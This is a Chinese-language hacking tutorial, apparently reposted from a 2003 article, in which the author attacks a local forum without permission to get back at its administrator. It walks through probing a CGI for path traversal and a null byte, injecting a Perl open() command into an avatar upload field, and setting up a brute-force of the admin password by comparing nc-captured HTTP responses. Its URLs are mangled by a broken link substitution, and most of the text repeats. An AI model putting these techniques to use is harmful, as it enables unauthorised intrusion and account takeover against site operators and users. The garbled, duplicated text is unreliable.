一、开篇
今天闲着无聊,到本地区的一个社区上转转,那些人污言秽语的,有个帖子还侵犯了一个朋友的版权,跟贴说了那人几句,管理员也不管,实在看不下去了,打算给管理员盆冷水清醒清醒。
二、准备/分析 安全第一,先开个HTTP代理,打开社区的登陆页面,看到上面显示的URL是:http://www.https://www.jb51.net/hack/****bbs.com/login.cgi 打开页面的源代码,找到登陆的关键几句: 所以,提交登陆信息的URL应该是http://wwww.https://www.jb51.net/hack/****bbs.com/login.cgi?username=ID&userpsd=PWD&menu=login&id=
习惯先查看用户信息,因为一般情况下用户名和密码都是紧连着保存在一起的,在这里我们更容易接近我们想要的信息。提交如下URL查看silkroad用户信息: http://www.https://www.jb51.net/hack/****bbs.com/yhreg.cgi?menu=viewuser&username=silkroad 返回正常用户信息
http://www.https://www.jb51.net/hack/****bbs.com/yhreg.cgi?menu=viewuser&username=./silkroad 同样返回正常用户信息,看来.和/已经被过滤掉了
http://www.https://www.jb51.net/hack/****bbs.com/yhreg.cgi?menu=viewuser&username=silkroad\0 提示此用户没有被注册 :(
扫描看看,有FTP弱口令~可惜是anonymous,价值不大。
回到CGI上,只在http://www.https://www.jb51.net/hack/****bbs.com/rank.cgi这上面发现用的是Yuzi的BBS3000。下面也可以下载BBS3000分析源代码,但比较费时间,我们先到几处敏感的地方看看, http://www.https://www.jb51.net/hack/****bbs.com/photo.cgi可以上传头像。 由于头像的显示是 关键就在https://www.jb51.net/hack/***这里,即图片的连接。在要上传的头像的输入栏中填入%20 %20
qq~;open%20F,">the0crat.txt";.gif 试试,提交,没有任何提示,程序也没对图片进行任何改变。
换个角度来看,既不分析源代码,也不入侵目标服务器,那么还是来试试探测探测社区管理员的密码,难说我今天运气比较好 :) 当然社区上的管理员也不会是白痴,不会设个空密码等你去玩。提到探测论坛ID的密码,大家首先想到的是什么?下载个又大又没趣的黑客软件来挂个字典?难道就没有点想要自己动手写一个脚本来破密码的冲动?嘿嘿。现在就教你自己动手一步一步来对密码进行探测 :)
密码探测的一般方法是: ①取得预进行猜测的密码列表 | | | ②向目标依次提交密码 <--------- | | | | | | ③根据目标的响应判断密码是否正确 | | | | | | | | | | 密码正确 密码错误 | | | | | | | | | | 返回给用户密码 Next-----------------
第三步要绕个圈子,其他的几步用程序就能很简单的实现。 所以先从第三步开始: 我不了解别的那些程序是怎么进行判断的,估计是先取得成功登陆和密码错误的两个页面的代码,然后对比它们的不同点,可能还有别的办法,可我还没想到~~~:) 所以,首先注册个ID,帐号asdfasdf,密码asdfasdf,根据前面取得的信息,此ID提交的URL为http://www.https://www.jb51.net/hack/****bbs.com/login.cgi?username=asdfasdf&userpsd=asdfasdf&menu=login&id=,"username="这后面的是用户ID,"userpsd="这后面是用户密码,然后登出社区 现在用telnet去取得我们想要的信息: F:\>nc -vv www.https://www.jb51.net/hack/****bbs.com 80 <<<-----用nc连接目标WEB服务的端口,别说你不知道nc是什么,嘿嘿
Warning: inverse host lookup failed for https://www.jb51.net/hack/***.https://www.jb51.net/hack/***.https://www.jb51.net/hack/***.https://www.jb51.net/hack/***: h_errno 11004: NO_DATA
www.https://www.jb51.net/hack/****bbs.com [https://www.jb51.net/hack/***.https://www.jb51.net/hack/***.https://www.jb51.net/hack/***.https://www.jb51.net/hack/***] 80 (http) open
GET http://www.https://www.jb51.net/hack/****bbs.com/login.cgi?username=asdfasdf&userpsd=error&menu=login&id= HTTP/1.1
<<<-------这里用到前面提到的提交用户登陆信息的URL,但用的是错误密码
host:iis-server
HTTP/1.1 200 OK
Date: Mon, 18 Aug 2003 11:59:41 GMT
Server: Apache/1.3.26 (Unix) PHP/4.0.6
Transfer-Encoding: chunked
Content-Type: text/html
fe7 <<<------------注意这个
...... 这个是非成功登陆后返回的信息,再来: F:\>nc -vv www.https://www.jb51.net/hack/****bbs.com 80
Warning: inverse host lookup failed for https://www.jb51.net/hack/***.https://www.jb51.net/hack/***.https://www.jb51.net/hack/***.https://www.jb51.net/hack/***: h_errno 11004: NO_DATA
www.https://www.jb51.net/hack/****bbs.com [https://www.jb51.net/hack/***.https://www.jb51.net/hack/***.https://www.jb51.net/hack/***.https://www.jb51.net/hack/***] 80 (http) open
GET http://www.https://www.jb51.net/hack/****bbs.com/login.cgi?username=asdfasdf&userpsd=asdfasdf&menu=login&id= HTTP/1.1
<<<-------这次用的是正确的密码
host:iis-server
HTTP/1.1 200 OK
Date: Mon, 18 Aug 2003 12:09:43 GMT
Server: Apache/1.3.26 (Unix) PHP/4.0.6
Transfer-Encoding: chunked
Content-Type: text/html
18d <<<------------注意这个
二、准备/分析 安全第一,先开个HTTP代理,打开社区的登陆页面,看到上面显示的URL是:http://www.https://www.jb51.net/hack/****bbs.com/login.cgi 打开页面的源代码,找到登陆的关键几句: 所以,提交登陆信息的URL应该是http://wwww.https://www.jb51.net/hack/****bbs.com/login.cgi?username=ID&userpsd=PWD&menu=login&id=
习惯先查看用户信息,因为一般情况下用户名和密码都是紧连着保存在一起的,在这里我们更容易接近我们想要的信息。提交如下URL查看silkroad用户信息: http://www.https://www.jb51.net/hack/****bbs.com/yhreg.cgi?menu=viewuser&username=silkroad 返回正常用户信息
http://www.https://www.jb51.net/hack/****bbs.com/yhreg.cgi?menu=viewuser&username=./silkroad 同样返回正常用户信息,看来.和/已经被过滤掉了
http://www.https://www.jb51.net/hack/****bbs.com/yhreg.cgi?menu=viewuser&username=silkroad\0 提示此用户没有被注册 :(
扫描看看,有FTP弱口令~可惜是anonymous,价值不大。
回到CGI上,只在http://www.https://www.jb51.net/hack/****bbs.com/rank.cgi这上面发现用的是Yuzi的BBS3000。下面也可以下载BBS3000分析源代码,但比较费时间,我们先到几处敏感的地方看看, http://www.https://www.jb51.net/hack/****bbs.com/photo.cgi可以上传头像。 由于头像的显示是 关键就在https://www.jb51.net/hack/***这里,即图片的连接。在要上传的头像的输入栏中填入%20 %20
qq~;open%20F,">the0crat.txt";.gif 试试,提交,没有任何提示,程序也没对图片进行任何改变。
换个角度来看,既不分析源代码,也不入侵目标服务器,那么还是来试试探测探测社区管理员的密码,难说我今天运气比较好 :) 当然社区上的管理员也不会是白痴,不会设个空密码等你去玩。提到探测论坛ID的密码,大家首先想到的是什么?下载个又大又没趣的黑客软件来挂个字典?难道就没有点想要自己动手写一个脚本来破密码的冲动?嘿嘿。现在就教你自己动手一步一步来对密码进行探测 :)
密码探测的一般方法是: ①取得预进行猜测的密码列表 | | | ②向目标依次提交密码 <--------- | | | | | | ③根据目标的响应判断密码是否正确 | | | | | | | | | | 密码正确 密码错误 | | | | | | | | | | 返回给用户密码 Next-----------------
第三步要绕个圈子,其他的几步用程序就能很简单的实现。 所以先从第三步开始: 我不了解别的那些程序是怎么进行判断的,估计是先取得成功登陆和密码错误的两个页面的代码,然后对比它们的不同点,可能还有别的办法,可我还没想到~~~:) 所以,首先注册个ID,帐号asdfasdf,密码asdfasdf,根据前面取得的信息,此ID提交的URL为http://www.https://www.jb51.net/hack/****bbs.com/login.cgi?username=asdfasdf&userpsd=asdfasdf&menu=login&id=,"username="这后面的是用户ID,"userpsd="这后面是用户密码,然后登出社区 现在用telnet去取得我们想要的信息: F:\>nc -vv www.https://www.jb51.net/hack/****bbs.com 80 <<<-----用nc连接目标WEB服务的端口,别说你不知道nc是什么,嘿嘿
Warning: inverse host lookup failed for https://www.jb51.net/hack/***.https://www.jb51.net/hack/***.https://www.jb51.net/hack/***.https://www.jb51.net/hack/***: h_errno 11004: NO_DATA
www.https://www.jb51.net/hack/****bbs.com [https://www.jb51.net/hack/***.https://www.jb51.net/hack/***.https://www.jb51.net/hack/***.https://www.jb51.net/hack/***] 80 (http) open
GET http://www.https://www.jb51.net/hack/****bbs.com/login.cgi?username=asdfasdf&userpsd=error&menu=login&id= HTTP/1.1
<<<-------这里用到前面提到的提交用户登陆信息的URL,但用的是错误密码
host:iis-server
HTTP/1.1 200 OK
Date: Mon, 18 Aug 2003 11:59:41 GMT
Server: Apache/1.3.26 (Unix) PHP/4.0.6
Transfer-Encoding: chunked
Content-Type: text/html
fe7 <<<------------注意这个
...... 这个是非成功登陆后返回的信息,再来: F:\>nc -vv www.https://www.jb51.net/hack/****bbs.com 80
Warning: inverse host lookup failed for https://www.jb51.net/hack/***.https://www.jb51.net/hack/***.https://www.jb51.net/hack/***.https://www.jb51.net/hack/***: h_errno 11004: NO_DATA
www.https://www.jb51.net/hack/****bbs.com [https://www.jb51.net/hack/***.https://www.jb51.net/hack/***.https://www.jb51.net/hack/***.https://www.jb51.net/hack/***] 80 (http) open
GET http://www.https://www.jb51.net/hack/****bbs.com/login.cgi?username=asdfasdf&userpsd=asdfasdf&menu=login&id= HTTP/1.1
<<<-------这次用的是正确的密码
host:iis-server
HTTP/1.1 200 OK
Date: Mon, 18 Aug 2003 12:09:43 GMT
Server: Apache/1.3.26 (Unix) PHP/4.0.6
Transfer-Encoding: chunked
Content-Type: text/html
18d <<<------------注意这个
版权声明
本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。
本文地址:/websafe/jbgongfang/149021.html